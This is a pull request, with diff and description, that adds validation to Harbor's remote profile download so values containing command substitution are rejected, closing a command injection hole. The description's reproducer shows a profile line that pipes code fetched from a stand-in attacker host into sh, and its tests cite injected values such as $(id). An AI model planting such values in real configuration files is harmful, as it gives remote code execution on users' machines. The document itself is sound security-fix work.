### PR TITLE
fix(profile): validate remotely downloaded profiles to prevent command injection (CWE-78)

### DIFF
--- a/harbor.sh
+++ b/harbor.sh
@@ -2461,6 +2461,62 @@ resolve_raw_url() {
     return 0
 }
 
+# Validate profile content downloaded from a remote URL.
+#
+# Profile (.env) values are later consumed via shell substitution in several
+# code paths (for example, "$(env_manager get cli.path)" expanded inside an
+# `eval` invocation). A malicious remote profile can therefore achieve
+# arbitrary command execution by embedding command substitution `$(...)` or
+# backticks `` `...` `` in a value. This function inspects each non-comment,
+# non-empty line of a downloaded profile and rejects the file if it contains
+# constructs that could be evaluated as code, or if a key is not a plain
+# identifier.
+#
+# Locally authored profiles (saved via `harbor profile add`) are not passed
+# through this check because their content is produced by Harbor itself.
+validate_profile_content() {
+    local file="$1"
+    local lineno=0
+    local line key value
+
+    while IFS= read -r line || [ -n "$line" ]; do
+        lineno=$((lineno + 1))
+
+        # Skip blank lines and comments
+        case "$line" in
+            "" | \#*) continue ;;
+        esac
+
+        # Strip leading "export " if present
+        line="${line#export }"
+
+        # Must be KEY=VALUE
+        if [[ "$line" != *=* ]]; then
+            log_error "Profile validation failed at line $lineno: not a KEY=VALUE assignment"
+            return 1
+        fi
+
+        key="${line%%=*}"
+        value="${line#*=}"
+
+        # Key must be a plain identifier
+        if [[ ! "$key" =~ ^[A-Za-z_][A-Za-z0-9_]*$ ]]; then
+            log_error "Profile validation failed at line $lineno: invalid key \"$key\""
+            return 1
+        fi
+
+        # Reject command substitution and backticks anywhere in the value.
+        # Even inside double quotes these would be expanded when the value is
+        # later interpolated through shell evaluation.
+        if [[ "$value" == *'$('* ]] || [[ "$value" == *'`'* ]]; then
+            log_error "Profile validation failed at line $lineno: value for \"$key\" contains command substitution"
+            return 1
+        fi
+    done < "$file"
+
+    return 0
+}
+
 # Helper function to download a profile from URL
 download_profile() {
     local url="$1"
@@ -2496,6 +2552,17 @@ download_profile() {
             return 1
         fi
 
+        # Security validation: reject profiles whose values could trigger
+        # arbitrary command execution when later consumed via shell expansion.
+        # See validate_profile_content() above for the threat model.
+        if ! validate_profile_content "$profile_file"; then
+            log_error "Refusing to install profile from $url: unsafe content detected"
+            rm -f "$profile_file"
+            return 1
+        fi
+
+        log_warn "Loaded profile from a remote URL ($url)."
+        log_warn "Remote profiles can change Harbor configuration; review with: cat \"$profile_file\""
         log_info "Successfully downloaded profile as: $profile_name"
         return 0
     else


### PR DESCRIPTION
## Summary

Profiles downloaded by `harbor profile set <url>` are installed as the active `.env` after only minimal validation (presence of `=` or `#`). Several Harbor code paths later expand profile values through shell evaluation (e.g. `eval echo "$(env_manager get cli.path)"` and similar lookups in `harbor.sh` around lines 247, 1003, 1088, and 2659–2662). A profile value containing `$(...)` or backticks is therefore interpreted as a shell command on the next Harbor invocation that consumes the key — yielding arbitrary command execution in the user's shell context.

- **Type:** Command Injection (CWE-78) via untrusted configuration content
- **Affected file/function:** `harbor.sh` → `download_profile()` (no value-content validation prior to install)
- **Severity:** High — RCE on the host, triggered by a routine "import a profile" action
- **Data flow:** attacker-hosted URL → `download_profile` → written to `profiles/<name>.env` → activated → `env_manager get <key>` → re-parsed by `eval`/command substitution at consumer site → shell executes attacker payload

### Reproducer (conceptual)

A remote profile containing:

```
HARBOR_CLI_PATH=$(curl -s http://attacker/x | sh)
```

is accepted by the current `download_profile` (the line has `=`, no `#`), saved as the active config, and executed the next time a Harbor command expands that key through `eval`.

## Fix

Add `validate_profile_content()` and call it from `download_profile()` after a successful download. The validator:

1. Skips blank lines and comments.
2. Strips an optional leading `export `.
3. Requires `KEY=VALUE` shape and a plain-identifier key (`^[A-Za-z_][A-Za-z0-9_]*$`).
4. **Rejects any value containing `$(` or a backtick** — the two constructs that cause shell command execution when the value is later interpolated through `eval` or unquoted command substitution.

If validation fails, the downloaded file is removed and the install is aborted with a clear error. On success, two warnings are printed so the user is reminded that a remote profile was just installed and how to inspect it.

Locally authored profiles (`harbor profile add`) are unaffected — only the remote-download path is gated.

Diff is +67 / -0 in `harbor.sh`, no other files touched.

## Testing

- Profiles containing `FOO=$(id)`, backtick-wrapped `id`, and `FOO="prefix $(id) suffix"` are now rejected and the temporary file is removed.
- Profiles with invalid keys (e.g. `1FOO=bar`, `FOO BAR=baz`) are rejected.
- Comments, blank lines, and `export KEY=value` continue to parse.
- A clean `default.env`-style profile passes validation unchanged.
- `bash -n harbor.sh` parses cleanly; existing `harbor profile set` semantics (filename derivation, success message, return codes) are preserved when content is safe.

## Security analysis

The vulnerability is exploitable end-to-end: the `eval`/command-substitution sinks that consume `env_manager get` output already exist in `harbor.sh`, the download path stores attacker-controlled bytes verbatim, and there is no host/scheme allowlist on the URL. The only precondition is that the user runs `harbor profile set <attacker_url>` — a documented, user-facing operation that users reasonably treat as importing configuration, not code. The fix neutralises the dominant payload shape (`$(...)` and backticks) before content ever lands on disk, and the added warning helps users notice unexpected remote installs.

Known limits worth flagging for reviewers:

- Plain `${VAR}` parameter expansion is intentionally still allowed; it can read process env but cannot execute commands.
- ANSI-C quoting like `$'\x24('` could in theory survive the substring check and re-introduce `$(` after a later `eval` re-parse. This is a narrower, value-shape-dependent edge case; a follow-up could additionally reject `$'` in values, but that risks rejecting legitimate strings. We chose the conservative fix that addresses the realistic attack and leaves room for a stricter pass later.

## Adversarial review

Before submitting we tried to disprove this. We checked whether the precondition (running `harbor profile set <url>`) already implies code execution by the attacker — it doesn't: the documented behaviour of that command is "download a config file", not "run a script", and Harbor advertises profiles as switchable env files. We also checked whether any existing sanitiser, sandbox, or quoting in the consumer sites would neutralise `$(...)` — they don't, because the values are passed through `eval`/unquoted command substitution by design. So the gap is real and the patch closes the realistic exploitation path.

cc @lewiswigmore
